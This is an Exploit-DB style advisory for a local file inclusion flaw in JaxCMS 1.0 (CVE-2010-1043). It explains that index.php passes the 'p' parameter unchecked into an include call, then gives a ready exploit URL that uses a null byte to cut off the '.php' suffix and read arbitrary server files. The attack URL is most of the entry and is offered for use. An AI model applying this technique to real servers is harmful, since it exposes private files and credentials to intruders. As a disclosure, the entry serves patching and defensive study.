JaxCMS 1.0 - Local File Inclusion

Author: Hamza 'MizoZ' N.
type: webapps
platform: php
port: 
date_added: 2010-02-07  
date_updated:   
verified: 1  
codes: OSVDB-62161;CVE-2010-1043  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comJaxCMS1.0.zip  

raw file: 11359.txt  
/*

Name : JaxCMS (p) Local File Include
WebSite : http://www.pixiescripts.com/

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com<mailto:mizozx@gmail.com>

Greetz : Zuka !

*/

The vulnerability is in the get $_GET['p'] , the index.php include '/pages/'.$_GET['p'].'.php'

So we can read any file in the server .

EXPLOIT :

http://server/[JaxCMS PATH]/index.php?p=[LFI]%00